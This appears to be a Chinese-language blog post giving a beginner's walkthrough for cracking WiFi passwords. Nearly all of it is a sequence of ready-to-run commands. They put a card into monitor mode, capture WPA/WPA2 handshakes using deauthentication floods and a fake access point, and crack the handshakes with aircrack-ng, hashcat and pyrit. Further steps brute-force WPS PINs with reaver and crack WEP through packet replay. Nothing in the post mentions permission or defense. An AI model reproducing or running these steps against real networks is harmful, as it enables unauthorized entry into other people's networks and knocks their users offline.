• [WIFI] WIFI 破解(初级)


    话不多说,先来看看字典破解 wpa2 的效果

    ===================================

    ===============================================
    字典破解 wifi-wpa/wpa2
    目前最常用的加密类型
    此方法只适合破解弱口令
    其他暴力破解伤CPU/GPU
    ===============================================
    1. 安装aircrack-ng
       1. 直接使用apt-get,但有的软件仓库不是最新版
       2. 源码安装 http://www.aircrack-ng.org/
          * 现在要翻一下才能下载

    2. 无线网卡开启monitor(建议另外使用usb无线网卡)
      > sudo ifconfig wlan0 down
      > sudo iwconfig wlan0 mode monitor

    3. 查看无线网络,选择对象BSSID和CHN(通道),同时记下ESSID
      > sudo airodump-ng wlan0

    4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
      > sudo airodump-ng -w wpa2 -c CHN --bssid BSSID wlan0
      * -w 为保存的抓包文件的前缀
      * -c 为前面记录的通道

    5. 创建fake AP(可以加快获取握手报文)
      > sudo airbase-ng -a BSSID --essid ESSID -c CH -Z 4 -W 1 wlan0
        * 如果是wpa  一般是  -z 2  z小写(TKIP)
        * 如果是wpa2 一般是  -Z 4  Z大写(CCMP)

    6. 向该网络内广播解除认证报文
      > sudo aireplay-ng -0 0 -a BSSID -c CLIENTID --ignore-negative-one wlan0

    7. 等待handshake
      > 步骤4中右上脚显示收到handshake报文
      > 使用aircrack-ng *.cap 探测是否包含handshake
      > 当包含handshake报文时停止4,5,6

    以下使用三种软件破解:
    aircrack-ng
    ------
    1. 开始破解
       > aircrack-ng *.cap -w dict
       * dict为字典文件,每一行一个密码

    hashcat
    -------
    1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
       > wpaclean out.cap wpa2-01.cap
       > aircrack-ng out.cap -J done

    2. 开始破解
       > hashcat -m 2500 done.hccap dict

    pyrit
    -------
    1. 开始破解
       > pyrit -r wpa2-01.cap -i dict attack_passthrough

    ===========================================
    通过PIN破解wifi
    此方法需要wifi开启wps功能,且信号尽量好
    目前大部分厂家的无线路由器默认是关闭wps的
    同时也具有防PIN的功能
    所以现在此方法用得不多了
    ===========================================

    1. 网卡配置参考wpa/wpa2破解

    2. 查看开启WPS的无线网络,选择对象BSSID
      > sudo airodump-ng --wps wlan0

    3. 开始破解
      > sudo reaver -i wlan0 -b BSSID -vv
      * 根据实际环境可以改变pin的间隔时间

    4. 漫长的等待

    ============================================
    WEP加密方式破解
    如果有WEP加密的wifi基本都可以很快破解
    但是很不幸,这种加密方式已很难见到
    但是还是学习下
    ============================================
    1. 网卡配置参考wpa/wpa2破解

    2. 查看无线无线网络,找到加密方式为WEP的wifi, 记录对象BSSID
      > sudo airodump-ng wlan0

    3. 对指定对象进行dump
      > sudo airodump-ng -w wep -c 10 --bssid BSSID wlan0

    4. 向对象发送请求以获取更多的报文
      > sudo aireplay-ng -1 0 -a BSSID wlan0
      * 此步骤可选择攻击方式很多,可以自行man一下

    5. 读取网络中的报文(读取上万后即可停止)
      > sudo aireplay-ng -3 -b BSSID wlan0

    6. 进行破解,利用当前目录下的.cap文件
      > aircrack-ng wep-01.cap

    7. 如果第6步破解失败,则重复5-6

  • 相关阅读:
    装饰器的应用
    绑定路由关系
    基本使用
    numpy多项式拟合
    pandas空值处理与插值
    索引
    事务
    子查询
    视图
    自关联
  • 原文地址:https://www.cnblogs.com/Areas/p/5599532.html
Copyright © 2020-2023  润新知